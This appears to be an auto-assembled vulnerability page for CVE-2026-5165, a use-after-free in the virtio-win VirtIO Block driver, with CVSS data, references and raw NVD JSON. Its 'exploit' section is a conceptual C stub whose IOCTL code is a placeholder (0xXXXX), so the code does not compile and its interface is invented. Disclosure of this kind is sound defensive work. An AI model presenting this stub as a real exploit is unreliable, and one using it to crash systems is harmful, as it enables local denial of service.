Security Vulnerability Report
CVE-2026-5165 CVSS 6.7 MEDIUM

CVE-2026-5165

Published: 2026-03-30 15:16:37
Last Modified: 2026-04-28 14:17:42

Description

A flaw was found in virtio-win, specifically within the VirtIO Block (BLK) device. When the device undergoes a reset, it fails to properly manage memory, resulting in a use-after-free vulnerability. This issue could allow a local attacker to corrupt system memory, potentially leading to system instability or unexpected behavior.

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:* - VULNERABLE
virtio-win (versions before the fixed release)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// Conceptual Proof of Concept for CVE-2026-5165
// This code demonstrates triggering the device reset to induce the UAF.
#include <windows.h>
#include <stdio.h>

// Define the specific IOCTL code for VirtIO Block Reset (Hypothetical)
#define IOCTL_VIRTIO_BLK_RESET 0xXXXX

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    BOOL result;

    // Attempt to open the VirtIO Block device
    // Note: This requires Administrative privileges
    // CreateFileW is called explicitly because the path is a wide string literal
    hDevice = CreateFileW(L"\\\\.\\VirtIO_BLK",
                          GENERIC_READ | GENERIC_WRITE,
                          0,
                          NULL,
                          OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        // GetLastError() returns a DWORD, so print it with %lu
        printf("Failed to open device. Error: %lu\n", GetLastError());
        return 1;
    }

    printf("Device opened. Sending reset command...\n");

    // Send the IOCTL to trigger the reset logic
    result = DeviceIoControl(hDevice,
                             IOCTL_VIRTIO_BLK_RESET,
                             NULL, 0,
                             NULL, 0,
                             &bytesReturned,
                             NULL);
    if (result) {
        printf("Reset command sent successfully.\n");
        printf("If vulnerable, the system may now experience instability or a crash due to UAF.\n");
    } else {
        printf("IOCTL failed. Error: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

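References

https://access.redhat.com/security/cve/CVE-2026-5165 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2453015 (Issue Tracking, Vendor Advisory)
https://github.com/virtio-win/kvm-guest-drivers-windows/pull/1493 (Issue Tracking)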

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5165", "sourceIdentifier": "[email protected]", "published": "2026-03-30T15:16:36.520", "lastModified": "2026-04-28T14:17:41.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in virtio-win, specifically within the VirtIO Block (BLK) device. When the device undergoes a reset, it fails to properly manage memory, resulting in a use-after-free vulnerability. This issue could allow a local attacker to corrupt system memory, potentially leading to system instability or unexpected behavior."}, {"lang": "es", "value": "Se encontró una falla en virtio-win, específicamente dentro del dispositivo VirtIO Block (BLK). Cuando el dispositivo sufre un reinicio, no gestiona la memoria correctamente, lo que resulta en una vulnerabilidad de uso después de liberación. Este problema podría permitir a un atacante local corromper la memoria del sistema, lo que podría llevar a inestabilidad del sistema o comportamiento inesperado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-825"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C9702E9-461D-4BEC-9AD4-EE6C8D5E3327"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-5165", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453015", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/virtio-win/kvm-guest-drivers-windows/pull/1493", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}